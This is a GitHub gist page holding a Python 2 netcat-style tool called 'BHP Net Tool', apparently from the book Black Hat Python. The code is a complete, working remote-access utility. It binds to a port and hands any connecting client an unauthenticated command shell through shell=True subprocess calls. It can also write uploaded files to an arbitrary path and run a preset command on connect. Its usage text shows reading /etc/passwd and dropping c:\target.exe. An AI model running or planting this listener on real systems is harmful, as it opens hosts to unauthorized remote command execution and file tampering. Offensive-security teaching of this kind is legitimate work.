Created
March 17, 2016 12:18
-
-
Save tjt263/0002eea11b329fde2f59 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys | |
| import socket | |
| import getopt | |
| import threading | |
| import subprocess | |
| # define some global variables | |
| listen = False | |
| command = False | |
| upload = False | |
| execute = "" | |
| target = "" | |
| upload_destination = "" | |
| port = 0 | |
| def run_command(command): | |
| # trim the newline | |
| command = command.rstrip() | |
| # run the command and catch the output | |
| try: | |
| output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True) | |
| except: | |
| output = "Failed to execute command.\r\n" | |
| # send output back to client | |
| return output | |
| def client_handler(client_socket): | |
| global upload | |
| global execute | |
| global command | |
| # check for upload | |
| if len(upload_destination): | |
| # read in all of the bytes and write to our destination | |
| file_buffer = "" | |
| # keep reading data until none is available | |
| while True: | |
| data = client_socket.recv(1024) | |
| if not data: | |
| break | |
| else: | |
| file_buffer += data | |
| # now we take these bytes and try to write them out | |
| try: | |
| file_descriptor = open(upload_destination,"wb") | |
| file_descriptor.write(file_buffer) | |
| file_descriptor.close() | |
| # acknowledge that we wrote the file out | |
| client_socket.send("Successfully saved file to %s\r\n" % upload_destination) | |
| except: | |
| client_socket.send("Failed to save file to %s\r\n" % upload_destination) | |
| # check for command execution | |
| if len(execute): | |
| #run the command | |
| output = run_command(execute) | |
| client_socket.send(output) | |
| # command shell request loop | |
| if command: | |
| while True: | |
| # display prompt | |
| client_socket.send("<BHP:#> ") | |
| # receive until linefeed | |
| cmd_buffer = "" | |
| while "\n" not in cmd_buffer: | |
| cmd_buffer += client_socket.recv(1024) | |
| # send back the command output | |
| response = run_command(cmd_buffer) | |
| # send back the response | |
| client_socket.send(response) | |
| def server_loop(): | |
| global target | |
| # if no target is defined, listen on all interfaces by default | |
| if not len(target): | |
| target = "0.0.0.0" | |
| server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| server.bind((target,port)) | |
| server.listen(5) | |
| while True: | |
| client_socket, addr = server.accept() | |
| # spin off a thread to handle our new client | |
| client_thread = threading.Thread(target=client_handler, args=(client_socket,)) | |
| client_thread.start() | |
| def client_sender(buffer): | |
| client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| try: | |
| # connect to target host | |
| client.connect((target,port)) | |
| if len(buffer): | |
| client.send(buffer) | |
| while True: | |
| # wait for response | |
| recv_len = 1 | |
| response = "" | |
| while recv_len: | |
| data = client.recv(4096) | |
| recv_len = len(data) | |
| response+= data | |
| if recv_len < 4096: | |
| break | |
| print response, | |
| # wait for more input | |
| buffer = raw_input("") | |
| buffer+= "\n" | |
| # send it off | |
| client.send(buffer) | |
| except: | |
| print "[*] Exception! Exiting." | |
| # tear down the connection | |
| client.close() | |
| def usage(): | |
| print "BHP Net Tool" | |
| print "Usage: bhpnet.py -t target_host -p port" | |
| print "-l --listen - listen on [host]:[port] for incoming connections" | |
| print "-e --execute=file_to_run - execute the given file upon receiving a connection" | |
| print "-c --command - initialize a command shell" | |
| print "-u --upload=destination - upon receiving connection upload a file and write to [destination]" | |
| print "Examples: " | |
| print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c" | |
| print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe" | |
| print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"" | |
| print "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135" | |
| sys.exit(0) | |
| def main(): | |
| global listen | |
| global command | |
| global upload | |
| global execute | |
| global target | |
| global upload_destination | |
| global port | |
| if not len(sys.argv[1:]): | |
| usage() | |
| # read the command line options | |
| try: | |
| opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","execute","target","port","command","upload"]) | |
| except getopt.GetoptError as err: | |
| print str(err) | |
| usage() | |
| for o,a in opts: | |
| if o in ("-h","--help"): | |
| usage() | |
| elif o in ("-l","--listen"): | |
| listen = True | |
| elif o in ("-e","--execute"): | |
| execute = a | |
| elif o in ("-c","--commandshell"): | |
| command = True | |
| elif o in ("-u","--upload"): | |
| upload_destination = a | |
| elif o in ("-t","--target"): | |
| target = a | |
| elif o in ("-p","--port"): | |
| port = int(a) | |
| else: | |
| assert False,"Unhandled Option" | |
| # are we going to listen or send data from stdin? | |
| if not listen and len(target) and port > 0: | |
| # read in the buffer from the command line | |
| # this will block, so send CTRL-D if not sending input to stdin | |
| buffer = sys.stdin.read() | |
| # send data off | |
| client_sender(buffer) | |
| # we are going to listen and potentially upload things, execute commands, | |
| # and drop a shell back depending on our command line options above | |
| if listen: | |
| server_loop() | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment